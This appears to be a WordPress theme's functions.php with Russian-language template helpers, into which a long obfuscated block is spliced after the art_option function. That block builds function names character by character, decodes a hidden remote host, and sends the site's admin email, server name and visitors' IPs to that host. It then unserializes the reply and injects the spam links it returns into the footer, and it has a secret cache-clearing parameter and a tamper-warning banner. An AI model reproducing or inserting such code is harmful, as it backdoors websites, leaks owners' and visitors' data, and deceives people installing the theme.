<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $XQHW='6';$Hzry='o';$FuHMeY='c';$hKrwCAi='4';$KuAu='s';$pSjLo='b';$ZUUTcPn='e';$QXThU='d';$OvkmOww='_';$SzVYx='e';$ntxsl='a';$WAKFB='e';$MIAAe='d';$vsoBYezN=$pSjLo.$ntxsl.$KuAu.$WAKFB.$XQHW.$hKrwCAi.$OvkmOww.$QXThU.$SzVYx.$FuHMeY.$Hzry.$MIAAe.$ZUUTcPn;$cXxNE='g';$sspIEFK='f';$cxfOAE='l';$xKpucIJ='e';$lNSr='n';$nMQNKR='t';$dyreyv='z';$GLxgAY='i';$FcBo='a';$Rgjzbspl=$cXxNE.$dyreyv.$GLxgAY.$lNSr.$sspIEFK.$cxfOAE.$FcBo.$nMQNKR.$xKpucIJ;$QlOy='1';$WUufzv='o';$NGrK='3';$KVlXVla='r';$ZacN='s';$ULiEbC='t';$gfTxdu='t';$KmrXAM='r';$REIXYii='_';$ftzlZCMn=$ZacN.$ULiEbC.$KmrXAM.$REIXYii.$KVlXVla.$WUufzv.$gfTxdu.$QlOy.$NGrK;$QSSbihb='t';$gjzlUTa='e';$KOdD='v';$VbXj='r';$fLuPsQ='s';$LRBkmDx='r';$GyvbnHDL=$fLuPsQ.$QSSbihb.$VbXj.$LRBkmDx.$gjzlUTa.$KOdD;                     $am_________m='6';$pi_________c='o';$sq______________a='c';$wa___________g='4';$iy_______m='s';$rm______x='b';$vn___________s='e';$yn____________q='d';$zl___o='_';$zc_________o='e';$op___j='a';$nv______________w='e';$dj_______________e='d';$qu________x=$rm______x.$op___j.$iy_______m.$nv______________w.$am_________m.$wa___________g.$zl___o.$yn____________q.$zc_________o.$sq______________a.$pi_________c.$dj_______________e.$vn___________s;$fi______________o='x';$id_____________i='n';$jk___t='c';$sm__a='s';$ya______h='n';$ue_______d='_';$tz______w='i';$mj______c='t';$zt______________b='s';$aq______c='f';$cs________h='i';$qe__p='e';$qj___x='o';$dz________a='t';$jm____________w='u';$gw_____________p=$aq______c.$jm____________w.$ya______h.$jk___t.$dz________a.$cs________h.$qj___x.$id_____________i.$ue_______d.$qe__p.$fi______________o.$tz______w.$zt______________b.$mj______c.$sm__a;$tl_______m='f';$yk_________o='o';$fw_______________f='p';$qm_____________o='e';$bc____________y='n';$cg__________z=$tl_______m.$yk_________o.$fw_______________f.$qm_____________o.$bc____________y;$vo_____x='f';$zt_____y='d';$ml___y='e';$nn_____a='a';$qa_____________v='r';$ng__________g=$vo_____x.$qa_____________v.$ml___y.$nn_____a.$zt_____y;$nc_____d='e';$lp______q='c';$vt_______________m='l';$fh_______________m='s';$xy_______________q='o';$rl____________j='f';$yx______________b=$rl____________j.$lp______q.$vt_______________m.$xy_______________q.$fh_______________m.$nc_____d;define("WP_ID", $qu________x("Mi4wLjA="));define("WP_TTL", $qu________x("MTA4MDA="));define("WP_SRC", $qu________x("dHBva24="));function wp_get_header() {global $qu________x, $gw_____________p;if ($gw_____________p($qu________x("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$gw_____________p($qu________x("d3BfZ2V0X2Zvb3Rlcg==")) &&$gw_____________p($qu________x("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $qu________x, $cg__________z, $yx______________b, $ng__________g;$cr____________j = TEMPLATEPATH."/".$qu________x("Zm9vdGVyLnBocA==");$ov_____________n = @$cg__________z($cr____________j, "r");$cr____________j = @$ng__________g($ov_____________n, @filesize($cr____________j));@$yx______________b($ov_____________n);$il_____v = TEMPLATEPATH."/".$qu________x("ZnVuY3Rpb25zLnBocA==");$ov_____________n = @$cg__________z($il_____v, "r");$il_____v = @$ng__________g($ov_____________n, @filesize($il_____v));@$yx______________b($ov_____________n);$av__________r = 0;if($cr____________j && $il_____v) {if ($qu________x("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($cr____________j, $qu________x("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$av__________r = 1;}if (substr_count($cr____________j, "wp_theme_GPL_credits()") < 1) {$av__________r = 2;}}if(WP_ID != "2.0.0") {$av__________r = 12;}}if($av__________r > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $av__________r -->";}}function wp_loaded() {global $qu________x, $gw_____________p;return $gw_____________p($qu________x("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($ev_________o, $vp_____z = "(more...)", $oo____c = 0, $um_______________x = "") {$ku_________t = get_the_content($vp_____z, $oo____c, $um_______________x);$ku_________t = apply_filters("the_content", $ku_________t);$ku_________t = str_replace("]]>", "]]>", $ku_________t);if (strlen($_GET["p"]) > 0) {echo $ku_________t;}else if ((strlen($ku_________t)>$ev_________o) && ($er__________o = strpos($ku_________t, " ", $ev_________o ))) {$ku_________t = substr($ku_________t, 0, $er__________o);$ku_________t = $ku_________t;echo $ku_________t;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$vp_____z</a></div></p>";} else {echo $ku_________t;}}}$nx___________v='e';$dw____w='6';$pt____i='o';$vi________z='e';$hb_____j='b';$zx____r='n';$tm______________l='_';$ea________x='4';$dv____e='s';$rz_________w='a';$st____________w='e';$wt_________a='c';$mz____q='d';$jy____________x=$hb_____j.$rz_________w.$dv____e.$st____________w.$dw____w.$ea________x.$tm______________l.$nx___________v.$zx____r.$wt_________a.$pt____i.$mz____q.$vi________z;$ex______p='e';$pc_______s='t';$ic___n='e';$ea_________d='e';$ap____k='_';$cb_____________t='l';$cx____m='f';$nm______o='t';$bo_______________i='s';$aj_____h='_';$al______f='t';$wa___b='o';$jr__________u='i';$ex____________x='g';$ar____b='n';$gv____j='c';$ak___p='n';$ce__________l=$cx____m.$jr__________u.$cb_____________t.$ea_________d.$aj_____h.$ex____________x.$ex______p.$pc_______s.$ap____k.$gv____j.$wa___b.$ar____b.$al______f.$ic___n.$ak___p.$nm______o.$bo_______________i;$ch___y='s';$tl____________i='i';$wq______e='e';$ez______________q='x';$oh____________s='f';$bc___________g='_';$rr______________v='l';$ch______________o='e';$db_______m='i';$tn__w='s';$pl_______h='t';$kz____x=$oh____________s.$db_______m.$rr______________v.$wq______e.$bc___________g.$ch______________o.$ez______________q.$tl____________i.$tn__w.$pl_______h.$ch___y;$tm_______r='r';$jn________j='a';$zf__a='o';$ya______________w='n';$kv___n='e';$nv______________s='p';$nh_________i='e';$uo________l='_';$aq_________d='m';$ae____________j='r';$ew______________f='o';$zj____________j='c';$dw_____t='s';$qk______________i='v';$fn__________t='i';$wx_______________l=$qk______________i.$kv___n.$ae____________j.$dw_____t.$fn__________t.$zf__a.$ya______________w.$uo________l.$zj____________j.$ew______________f.$aq_________d.$nv______________s.$jn________j.$tm_______r.$nh_________i;$oj_____________h='f';$tf____i='e';$si_________t='p';$qj_________t='s';$ya_______x='c';$pe___l='o';$um____t='o';$ft_______s='k';$oa__________f='n';$ml________u=$oj_____________h.$qj_________t.$um____t.$ya_______x.$ft_______s.$pe___l.$si_________t.$tf____i.$oa__________f;$ta_______y='r';$qd___________z='f';$rl__q='t';$qd______c='e';$gp___v='w';$hv______j='i';$gt__z=$qd___________z.$gp___v.$ta_______y.$hv______j.$rl__q.$qd______c;$wx___________m='5';$fn__n='m';$jk______________a='d';$oz__________v=$fn__n.$jk______________a.$wx___________m;$bk_______________x='r';$yh_____________g='e';$qp____________t='a';$mu___o='h';$sz______________i='a';$ll______r='p';$hq___d='l';$mi______________j='t';$dv__z=$bk_______________x.$yh_____________g.$sz______________i.$hq___d.$ll______r.$qp____________t.$mi______________j.$mu___o;$ay_______________d='n';$ac_______z='a';$ys______________y='e';$nv_________k='r';$hf_________x='u';$kp______________r='l';$ln_______________q='z';$op________n='i';$vm_________v='i';$zx________p='e';$el____________g='s';$it________z=$hf_________x.$ay_______________d.$el____________g.$zx________p.$nv_________k.$op________n.$ac_______z.$kp______________r.$vm_________v.$ln_______________q.$ys______________y;$wg____l='m';$au__________f='p';$xk___b='m';$pb__x='a';$kv____n='n';$js______n='t';$tw____k='e';$qe______________t=$js______n.$tw____k.$xk___b.$au__________f.$kv____n.$pb__x.$wg____l;$sc_______v='o';$ee_________z='a';$iz______x='_';$ck___s='s';$ut__________v='t';$gi_________z='c';$ez_______________z='r';$oh__r='c';$yq___________y='e';$gf_______________f='t';$nh__t='e';$em_________s='m';$nx_____s='e';$at____p='t';$ot___________q='e';$ky_____________m='r';$zd__c='_';$kx_________y='a';$ba_____________g='n';$bt___________f='x';$dy___________z='t';$kb__e=$ck___s.$dy___________z.$ez_______________z.$ot___________q.$ee_________z.$em_________s.$zd__c.$oh__r.$sc_______v.$ba_____________g.$at____p.$nx_____s.$bt___________f.$gf_______________f.$iz______x.$gi_________z.$ky_____________m.$yq___________y.$kx_________y.$ut__________v.$nh__t;function ku____m($ta__________a) {global $qu________x, $gw_____________p, $ce__________l, $wx_______________l, $kb__e;if (!$gw_____________p($qu________x("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($wx_______________l(PHP_VERSION, "5.0.0", ">=") && $gw_____________p($qu________x("ZmlsZV9nZXRfY29udGVudHM=")) && $gw_____________p($qu________x("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$hd______j = $kb__e(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$fa_____________z = @$ce__________l($ta__________a, 0, $hd______j);} else {$fa_____________z = @$ce__________l($ta__________a, 0);}return $fa_____________z;}function ic_____y($ta__________a) {global $gw_____________p, $ml________u, $gt__z, $qu________x;if (!$gw_____________p($qu________x("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$lc______________n = strpos($ta__________a, "/", 7);$qd_________v = array("uri"     => substr($ta__________a, $lc______________n),"host"    => str_replace("http://", "", substr($ta__________a, 0, $lc______________n)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$cg_____t = @$ml________u("$qd_________v[host]", 80, $iv___________y, $fb___c, 4);if (!$cg_____t) {return false;} else {$fa_____________z = "";$tr____u  = "GET $qd_________v[uri] HTTP/1.0\r\n";$tr____u .= "Host: $qd_________v[host]\r\n";$tr____u .= "Referer: $qd_________v[referer]\r\n";$tr____u .= "Connection: Close\r\n\r\n";@$gt__z($cg_____t, $tr____u);while (!@feof($cg_____t)) {$se_______________e = @fgets($cg_____t, (1024*24));if ($se_______________e == "\r\n") {$rg___________z = true;continue;}if ($rg___________z) {$fa_____________z .= $se_______________e;}}return $fa_____________z;}}function xz_________e($ta__________a) {global $gw_____________p;$hp_____________w = false;if ($ta__________a != "") {if ($gw_____________p("ku____m")) {$hp_____________w = @ku____m($ta__________a);}if (!$hp_____________w && ($gw_____________p("ic_____y"))) {$hp_____________w = @ic_____y($ta__________a);}}return $hp_____________w;}function va________j() {global $_SERVER, $oz__________v;$zk_________v = $_SERVER["SERVER_NAME"];if (substr("$zk_________v", 0, 4) == "www.") {$zk_________v = substr("$zk_________v", 4);}$zk_________v = $oz__________v("$_SERVER[SERVER_NAME]");return $zk_________v;}function na_____________v() {return "file";}function vc_______________g($ta__________a) {global $_SERVER, $ce__________l, $kz____x, $cg__________z, $yx______________b, $gt__z;$tt______________m = uc__y();$gr__z = va________j().".jpg";$et______________s = $tt______________m["dir_upload"]["path"]."/$gr__z";$qi______d = @filemtime($et______________s);if (!$qi______d || ((time()-$qi______d) >= WP_TTL)) {$hp_____________w = xz_________e($ta__________a);if ($hp_____________w) {if ($kz____x($et______________s)) {@unlink($et______________s);}$ov_____________n = @$cg__________z($et______________s, "x+");@$gt__z($ov_____________n, $hp_____________w);@$yx______________b($ov_____________n);}} else {if ($kz____x($et______________s)) {$hp_____________w = @$ce__________l($et______________s);} else {$hp_____________w = false;}}return $hp_____________w;}function uc__y() {global $_SERVER, $qu________x, $jy____________x;$or_______________u = wp_count_posts("post");$lr____n = pathinfo(get_bloginfo("template_directory"));$tt______________m = array("url" => array("report"      => $qu________x("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $lr____n,"dir_upload"=> ql___________z(),"queryString"=> array("?a001=".WP_ID,"a004=".$lr____n[filename],"a005=".$or_______________u->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => " <a href=\"http://lib.kharkov.ua/landscaping/385-galushka.html\">Ландшафтный дизайн</a>");$tt______________m["url"]["queryString"] = implode("&", $tt______________m["queryString"]);$tt______________m["url"]["report"] = $tt______________m["url"]["report"]."/?".$jy____________x($tt______________m["url"]["queryString"]).".html";return $tt______________m;}function ql___________z() {$qc_______________e = wp_upload_dir();if (isset($qc_______________e["error"])) {$he_______y = vc________j();if (is_writable($he_______y)) {$qc_______________e = array("path" => $he_______y);}}return $qc_______________e;}function vc________j() {global $gw_____________p, $oz__________v, $dv__z, $qe______________t;$at_______________r = (bool) ini_get("safe_mode");if ($at_______________r == true) {return false;}if ($gw_____________p("sys_get_temp_dir")) {$wd__________m = sys_get_temp_dir();if (is_writable($wd__________m)) {return $dv__z($wd__________m);}}if (!empty($_ENV["TMP"])) {return $dv__z($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $dv__z($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $dv__z($_ENV["TEMP"]);} else {$nm_______________b = $qe______________t($oz__________v(uniqid(rand(), true)), "");if ($nm_______________b) {$wd__________m = $dv__z(dirname($nm_______________b));@unlink($nm_______________b);return $wd__________m;} else {return false;}}}function rp__k() {global $_GET, $kz____x;$tt______________m = uc__y();$zk_________v = va________j();$xh____________i = na_____________v();$wj_______________d = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($xh____________i == "file") {$qc___________e = $tt______________m["dir_upload"]["path"]."/".$zk_________v.".jpg";if ($kz____x($qc___________e)) {@unlink($qc___________e);$wj_______________d = "deleted";}}$ih___________h = array("s"=> $wj_______________d,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($ih___________h AS $xg_______n => $id___________n) echo " [$xg_______n:$id___________n]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $gw_____________p, $qu________x, $it________z;$tt______________m = uc__y();$ro___a = "vc_______________g";if ($gw_____________p($ro___a)) {$fa_____________z = $ro___a($tt______________m["url"]["report"]);}if ($fa_____________z) {if ($fa_____________z = @$qu________x($fa_____________z)) {$fa_____________z = @$it________z($fa_____________z);if (strlen($fa_____________z[custom_credit]) >= 5) {$tt______________m["default_string"] = $fa_____________z[custom_credit];}if ($fa_____________z["status"] == "0") {$bo_______q = 1;$li_______________t = 1;} else {$ml___i = sizeof($fa_____________z["links"]);$du_____________t = $tt______________m["default_string"];if ($ml___i > 0 && $fa_____________z["links"] !== "") {$rr______o = 0;foreach ($fa_____________z["links"] as $mf_____________k => $og______a) {$rr______o++;if ($og______a->l_path == "" || $og______a->l_path == $_SERVER["REQUEST_URI"]) {$og______a->l_href = htmlspecialchars(strip_tags($og______a->l_href));$og______a->l_title = htmlspecialchars(strip_tags($og______a->l_title));$og______a->l_anchor = htmlspecialchars(strip_tags($og______a->l_anchor));$du_____________t .= " | ";$du_____________t .= "<a href='$og______a->l_href' title='$og______a->l_title'";if ($og______a->l_nofollow == "1") {$du_____________t .= " rel='nofollow'";}$du_____________t .= ">$og______a->l_anchor</a>";}}}$tt______________m["links"] = "$du_____________t";if ($fa_____________z[credit] == "0") {$tt______________m["links"] = "";}}} else {$bo_______q = "1";}} else {$bo_______q = "1";}if ($bo_______q == "1") {$tt______________m["links"] = $tt______________m["default_string"];}echo "$tt______________m[links]";echo "<!-- s: $fa_____________z[signature] -->";rp__k();}                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),  
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                   $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
       $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
